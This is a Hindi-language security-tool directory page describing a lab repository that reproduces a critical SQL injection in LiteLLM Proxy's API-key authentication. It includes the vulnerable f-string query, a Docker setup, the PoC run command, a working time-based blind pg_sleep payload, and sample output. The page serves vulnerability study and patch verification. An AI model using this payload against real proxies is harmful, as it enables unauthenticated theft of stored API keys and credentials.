Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-42208_lab — लाइटएलएलएम प्रॉक्सी के API कुंजी प्रमाणीकरण में एक गंभीर SQL इंजेक्शन के लिए प्रजनन वातावरण, जिसमें समय-आधारित ब्लाइंड PoC और परीक्षण के लिए Docker सेटअप शामिल है। | Kitploit
उपकरण/GitHubGitHub/imjdl/cve-2026-42208_lab
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubimjdl/cve-2026-42208_lab

CVE-2026-42208_lab

लाइटएलएलएम प्रॉक्सी के API कुंजी प्रमाणीकरण में एक गंभीर SQL इंजेक्शन के लिए प्रजनन वातावरण, जिसमें समय-आधारित ब्लाइंड PoC और परीक्षण के लिए Docker सेटअप शामिल है।

रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

LiteLLM Proxy SQL इंजेक्शन (GHSA-r75f-5x8p-qvmc)

LiteLLM Proxy की API कुंजी प्रमाणीकरण प्रक्रिया में SQL इंजेक्शन भेद्यता के लिए एक पुनरुत्पादन वातावरण।

भेद्यता सारांश

आइटमविवरण
सलाहGHSA-r75f-5x8p-qvmc
प्रकारSQL इंजेक्शन (CWE-89)
गंभीरताक्रिटिकल
प्रभावितlitellm >=1.81.16, <1.83.7
ठीक किया गयाlitellm >=1.83.7 (कमिट 4dc416ee74)

हमले का मार्ग

इंजेक्शन त्रुटि-हैंडलिंग कॉलबैक पथ में होता है, मुख्य प्रमाणीकरण प्रवाह में नहीं। जब एक गैर-sk- उपसर्ग वाला टोकन भेजा जाता है, तो अभिकथन विफल हो जाता है और कच्चा (अहैश्ड) टोकन विफलता कॉलबैक श्रृंखला से होकर एक SQL क्वेरी में प्रवाहित होता है जो f-string इंटरपोलेशन का उपयोग करती है:

root@kitploit:~
HTTP अनुरोध: Authorization: Bearer <पेलोड>
  → assert api_key.startswith("sk-") विफल होता है
  → _handle_authentication_error(api_key=RAW_TOKEN)
  → post_call_failure_hook
  → _enrich_failure_metadata_with_key_info
  → get_key_object(hashed_token=RAW_TOKEN)
  → get_data(token=RAW_TOKEN, table_name="combined_view")
  → SQL: WHERE v.token = '{RAW_TOKEN}'  ← इंजेक्शन

मुख्य sk- प्रमाणीकरण पथ शोषण योग्य नहीं है क्योंकि क्वेरी तक पहुँचने से पहले टोकन SHA256-हैश्ड होते हैं, जिससे केवल [0-9a-f] वर्ण उत्पन्न होते हैं।

पुनरुत्पादन

1. भेद्य वातावरण प्रारंभ करें

root@kitploit:~
docker compose up -d

यह PostgreSQL बैकएंड के साथ LiteLLM Proxy (v1.83.3-stable) प्रारंभ करता है।

2. PoC चलाएँ

root@kitploit:~
pip install requests
python poc_litellm_sqli.py --target http://localhost:4000 --delay 5

अपेक्षित आउटपुट

root@kitploit:~
╔═══════════════════════════════════════════════════════════╗
║   LiteLLM Proxy SQL Injection PoC                        ║
║   GHSA-r75f-5x8p-qvmc | CVE: Pending                    ║
║   Affected: litellm >=1.81.16, <1.83.7                  ║
║   Attack: time-based blind via error-handling callback    ║
╚═══════════════════════════════════════════════════════════╝

[*] Checking target: http://localhost:4000
[+] Target alive (status 200)

[*] Measuring baseline (3 requests)...
  Baseline avg: 0.022s

[*] Control: non-sk- token without pg_sleep...
  Control: 0.024s

=======================================================
  Time-based Blind SQL Injection (pg_sleep=5s)
=======================================================
  Payload: ' OR (SELECT 1 FROM (SELECT pg_sleep(5)) t) IS NOT NULL--
  Response: 5.018s

[+] VULNERABLE! pg_sleep(5) confirmed

तकनीकी विवरण

पेलोड निर्माण

PostgreSQL का pg_sleep() void लौटाता है, जो बूलियन संदर्भ (OR) में प्रकट नहीं हो सकता। पेलोड इसे टाइप त्रुटि से बचने के लिए एक सबक्वेरी में लपेटता है:

root@kitploit:~
' OR (SELECT 1 FROM (SELECT pg_sleep(N)) t) IS NOT NULL--

इसे litellm/proxy/utils.py में combined_view क्वेरी में इंजेक्ट किया जाता है:

root@kitploit:~
# भेद्य कोड (<=v1.83.3)
sql_query = f"""
    SELECT v.*, t.spend AS team_spend, ...
    FROM "LiteLLM_VerificationToken" AS v
    LEFT JOIN ...
    WHERE v.token = '{token}'   ← उपयोगकर्ता इनपुट का f-string इंटरपोलेशन
"""

प्रभाव

  • अप्रमाणित — कोई मान्य API कुंजी आवश्यक नहीं
  • डेटाबेस पढ़ने की पहुँच — ब्लाइंड इंजेक्शन के माध्यम से कोई भी डेटा निकालें (API कुंजियाँ, क्रेडेंशियल, कॉन्फ़िगरेशन)
  • सभी LLM प्रदाता कुंजियाँ जो प्रॉक्सी द्वारा प्रबंधित हैं, जोखिम में हैं

संदर्भ

  • GitHub सुरक्षा सलाह
  • फिक्स कमिट 4dc416ee74
  • Sysdig TRT खतरा खुफिया रिपोर्ट — प्रकटीकरण के 36 घंटों के भीतर वास्तविक दुनिया में शोषण देखा गया
टूल डाउनलोड करें